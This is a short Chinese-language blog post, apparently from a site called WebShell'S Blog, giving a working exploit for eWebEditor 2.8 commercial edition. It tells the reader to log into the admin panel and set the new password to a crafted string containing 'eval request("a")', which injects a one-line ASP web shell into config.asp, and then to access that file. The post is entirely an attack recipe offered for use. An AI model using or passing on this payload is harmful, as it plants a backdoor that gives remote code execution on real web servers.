ewebeditor 2.8 后台插上一句话

影响版本:2.8 商业版

攻击利用:登陆后台,点击修改密码—新密码设置为 1″:eval request(“a”)’

设置成功后,访问https://www.webshell.cc/ewebeditor/asp/config.asp文件即可,

一句话木马被写入到这个文件里面了.

 

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1347.html